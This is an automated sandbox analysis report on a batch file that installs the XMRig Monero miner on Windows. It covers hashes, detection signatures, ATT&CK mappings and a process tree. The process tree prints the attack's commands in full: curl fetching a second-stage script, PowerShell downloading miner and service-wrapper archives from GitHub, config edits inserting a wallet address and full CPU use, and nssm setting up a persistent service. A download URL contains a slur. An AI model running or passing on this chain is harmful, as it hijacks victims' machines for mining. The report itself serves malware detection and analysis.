xmrig | c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e

Analysis

max time kernel
1048s
max time network
1050s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
07/06/2024, 17:05

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

miner.bat
Size

169B
MD5

abfbeeced32bf0a03b8b0ceeea21e771
SHA1

ccf3673a38497264821bfe9d67a97cc8af444915
SHA256

c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e
SHA512

f2fb9f61d5f420271ab531e5b3829a1646a00b8a116a8759a4a88709d227f409e7545166284ad4a4cc0e0eac28473e633caee697d2432b412a63504bb404fa03

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 57 IoCs

miner

resource	yara_rule
behavioral1/files/0x0007000000023400-50.dat	family_xmrig
behavioral1/files/0x0007000000023400-50.dat	xmrig
behavioral1/memory/4036-53-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-185-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-186-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-187-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-188-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4620-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
18	2320	powershell.exe
23	2556	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4036	xmrig.exe
1764	nssm.exe
3924	nssm.exe
4776	nssm.exe
3056	nssm.exe
208	nssm.exe
804	nssm.exe
4448	nssm.exe
4620	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com
23	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
588	sc.exe
4152	sc.exe
768	sc.exe
4120	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4288	powershell.exe
2556	powershell.exe
2320	powershell.exe
1372	powershell.exe
1036	powershell.exe
4700	powershell.exe
3792	powershell.exe
2052	powershell.exe
3588	powershell.exe
5052	powershell.exe
3832	powershell.exe
2944	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4056	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2320	powershell.exe
2320	powershell.exe
3588	powershell.exe
3588	powershell.exe
1372	powershell.exe
1372	powershell.exe
1036	powershell.exe
1036	powershell.exe
5052	powershell.exe
5052	powershell.exe
4700	powershell.exe
4700	powershell.exe
3832	powershell.exe
3832	powershell.exe
2944	powershell.exe
2944	powershell.exe
4288	powershell.exe
4288	powershell.exe
3792	powershell.exe
3792	powershell.exe
2556	powershell.exe
2556	powershell.exe
2052	powershell.exe
2052	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeLockMemoryPrivilege	4620	xmrig.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4620	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4020 wrote to memory of 4392	4020	cmd.exe	82
PID 4020 wrote to memory of 4392	4020	cmd.exe	82
PID 4020 wrote to memory of 992	4020	cmd.exe	86
PID 4020 wrote to memory of 992	4020	cmd.exe	86
PID 992 wrote to memory of 2156	992	net.exe	87
PID 992 wrote to memory of 2156	992	net.exe	87
PID 4020 wrote to memory of 2952	4020	cmd.exe	88
PID 4020 wrote to memory of 2952	4020	cmd.exe	88
PID 4020 wrote to memory of 3264	4020	cmd.exe	89
PID 4020 wrote to memory of 3264	4020	cmd.exe	89
PID 4020 wrote to memory of 3724	4020	cmd.exe	90
PID 4020 wrote to memory of 3724	4020	cmd.exe	90
PID 4020 wrote to memory of 2872	4020	cmd.exe	91
PID 4020 wrote to memory of 2872	4020	cmd.exe	91
PID 4020 wrote to memory of 3000	4020	cmd.exe	92
PID 4020 wrote to memory of 3000	4020	cmd.exe	92
PID 4020 wrote to memory of 768	4020	cmd.exe	93
PID 4020 wrote to memory of 768	4020	cmd.exe	93
PID 4020 wrote to memory of 4120	4020	cmd.exe	94
PID 4020 wrote to memory of 4120	4020	cmd.exe	94
PID 4020 wrote to memory of 4056	4020	cmd.exe	95
PID 4020 wrote to memory of 4056	4020	cmd.exe	95
PID 4020 wrote to memory of 2320	4020	cmd.exe	97
PID 4020 wrote to memory of 2320	4020	cmd.exe	97
PID 4020 wrote to memory of 3588	4020	cmd.exe	98
PID 4020 wrote to memory of 3588	4020	cmd.exe	98
PID 4020 wrote to memory of 1372	4020	cmd.exe	99
PID 4020 wrote to memory of 1372	4020	cmd.exe	99
PID 4020 wrote to memory of 4036	4020	cmd.exe	100
PID 4020 wrote to memory of 4036	4020	cmd.exe	100
PID 4020 wrote to memory of 396	4020	cmd.exe	101
PID 4020 wrote to memory of 396	4020	cmd.exe	101
PID 396 wrote to memory of 1036	396	cmd.exe	102
PID 396 wrote to memory of 1036	396	cmd.exe	102
PID 1036 wrote to memory of 4412	1036	powershell.exe	103
PID 1036 wrote to memory of 4412	1036	powershell.exe	103
PID 4020 wrote to memory of 5052	4020	cmd.exe	104
PID 4020 wrote to memory of 5052	4020	cmd.exe	104
PID 4020 wrote to memory of 4700	4020	cmd.exe	107
PID 4020 wrote to memory of 4700	4020	cmd.exe	107
PID 4020 wrote to memory of 3832	4020	cmd.exe	108
PID 4020 wrote to memory of 3832	4020	cmd.exe	108
PID 4020 wrote to memory of 2944	4020	cmd.exe	109
PID 4020 wrote to memory of 2944	4020	cmd.exe	109
PID 4020 wrote to memory of 4288	4020	cmd.exe	110
PID 4020 wrote to memory of 4288	4020	cmd.exe	110
PID 4020 wrote to memory of 3792	4020	cmd.exe	111
PID 4020 wrote to memory of 3792	4020	cmd.exe	111
PID 4020 wrote to memory of 2556	4020	cmd.exe	113
PID 4020 wrote to memory of 2556	4020	cmd.exe	113
PID 4020 wrote to memory of 2052	4020	cmd.exe	114
PID 4020 wrote to memory of 2052	4020	cmd.exe	114
PID 4020 wrote to memory of 4152	4020	cmd.exe	115
PID 4020 wrote to memory of 4152	4020	cmd.exe	115
PID 4020 wrote to memory of 588	4020	cmd.exe	116
PID 4020 wrote to memory of 588	4020	cmd.exe	116
PID 4020 wrote to memory of 1764	4020	cmd.exe	117
PID 4020 wrote to memory of 1764	4020	cmd.exe	117
PID 4020 wrote to memory of 3924	4020	cmd.exe	118
PID 4020 wrote to memory of 3924	4020	cmd.exe	118
PID 4020 wrote to memory of 4776	4020	cmd.exe	119
PID 4020 wrote to memory of 4776	4020	cmd.exe	119
PID 4020 wrote to memory of 3056	4020	cmd.exe	120
PID 4020 wrote to memory of 3056	4020	cmd.exe	120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\miner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Windows\system32\curl.exe
  curl -o s.bat https://rentry.co/idiotnigger/raw/
  2⤵
  PID:4392
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2156
- C:\Windows\system32\where.exe
  where powershell
  2⤵
  PID:2952
- C:\Windows\system32\where.exe
  where find
  2⤵
  PID:3264
- C:\Windows\system32\where.exe
  where findstr
  2⤵
  PID:3724
- C:\Windows\system32\where.exe
  where tasklist
  2⤵
  PID:2872
- C:\Windows\system32\where.exe
  where sc
  2⤵
  PID:3000
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:768
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:4120
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im xmrig.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe" --help
  2⤵
  - Executes dropped EXE
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\system32\HOSTNAME.EXE
      "C:\Windows\system32\HOSTNAME.EXE"
      4⤵
      PID:4412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Rhatqedq\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:4152
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:588
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
  2⤵
  - Executes dropped EXE
  PID:3924
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
  2⤵
  - Executes dropped EXE
  PID:4776
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
  2⤵
  - Executes dropped EXE
  PID:208
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
  2⤵
  - Executes dropped EXE
  PID:804

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4448
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8322be71f1a4e7a7cd173cc974a9b754

SHA1
e6e801c6ef60591610c7faecf30675804afe22d1

SHA256
2cdc001726743f84d88c127da9f7202c52e9f8e36ceaec7bab0205393f38ef52

SHA512
9c301cdeac106be39e74ea38489ede9adb6df9545dd5c75fe7f4db417419b3143e9fa473f858b12c4dbf214c01d3da1a8bb079d12067eafeb20e83a9a44d0e66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
633da34a38638896c9a56c65a984d48a

SHA1
1ecc48e2ec10396bbe8972facf94a28d4a20635b

SHA256
2fa8e367aeb35f24f88785d48e2058b217aa3479e61c65d25a94be0d73c98dfa

SHA512
79ee129be3599bb324d25e6c58c2b685499cb401d24860431dead811cc70841d892a24554398e65dc4e47e997e2e2c569d4f3a7cf38cedd36088897314e7d1fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
55290cad72ae6425dfc7f8700f8831c4

SHA1
7d27a120f390d7d37804e49c2a60c52186e617d7

SHA256
b72cff83e87642ff178c8498e2b975c9f070887b24680f39cb5a950a181aee8b

SHA512
a1ce04ea1f5dd1afcf6b85810cf0ac44887cfe6c4d65ebc3d855ddef3884819c0473fda8979283ec41dc63af33565c1df4be59e0ac0be700d91f7d04bebb1539

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb8b74ccd85dd93ebd4dabf7ad235f88

SHA1
4bc42e45977bf9dc57c91a1fd7823dd0fc635c2e

SHA256
42f9fd3bffe1974e1cdaccb4789cd89422e6819f7c5dfbd8a387eef748bb095d

SHA512
e2130dff74317cd5cd03614ebfdaa045ae239fde9188b74d80a754c71f67c3461e6ec7d82fbb91f5fc634b383b4e6302bb80d341d2e5984a4180bb1d2b7440f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a68ac95d217375f12e461fe2fc66d0cf

SHA1
7fcd638d498ce1d86a2f9cf22e95d9fd960a9d92

SHA256
64caa6c8f37ed51cab9b95cf33cb204f42791a602fb3dc4daaf5e526ad46bde4

SHA512
f98e0b6775e3097a2e6f2c059a4607c9b8ce78b47183e640cf2c47da984db451922b946fb17f54aa6731e3a74b9399f570ece19011f8a298c4bc19eecbbfcc6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
242f6f073c0137e81eb72ae6d0283c90

SHA1
ed92ef0896a02aea4159fb6069e71c3f19122234

SHA256
b29986d96e3aaa961097f761fbcbb293d21868d5f8118b1bc2caa850f07d2486

SHA512
5cc114fe7fda0300fb996a9e6cd37fee5aec41b17e3fe807a2269058811a50155897e6bc579c21e952c89ca1f0869c095f05bd64dadc8cf5af0be8407ceca47d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vectxeja.eah.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat

Filesize
14KB

MD5
12a235844829126b56d90f5ff606c555

SHA1
7fed9b9b08a9849dd61f32a6d731e5dd2f94ccc8

SHA256
dfb89d7d439866741417e5aaee451488036f3d4aff806bf6d448fadeefa717ab

SHA512
ad72e804d21b3acad05476e02c43d80b4d627d7ac5d6a7ae315a58e7cd34cb0b0560182526839e622bcf13c48c1549e1e331a3b7799fdd1438cb471e556ee62a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
ee6c19c5f25bbca56f898c689342c21f

SHA1
02905d428d6093ae76733eae72b18af23039e54d

SHA256
c447b4bf6422f328f40ef88a5f3a9b8337dabbde79a44cfb875dd1caf49ce16b

SHA512
221c2c8fb6a28e1b0f38584afdb38601261932dd7b7f6c6d8abb2c3985a4ec88279115fe694e6d4eefb494cbf9dde8dbaf7ca568e0c022a80afffd63339e847b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
484dd6190d73aa5394611861163ffb5b

SHA1
41accc9c631ec422b07b755a60127f086f3280d3

SHA256
cdb6e5bdc864af00cf542ed030303b02b0c58bf4adbaa7858ef0d9e322306478

SHA512
d5a264476d4ce793d25da1d4e99f0ea5755d012551f7477502db8864353ba0007b09455ef676433c3dd7b5a64dc7fbf5283eaec316b2f628790f5d44ea971c2f

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
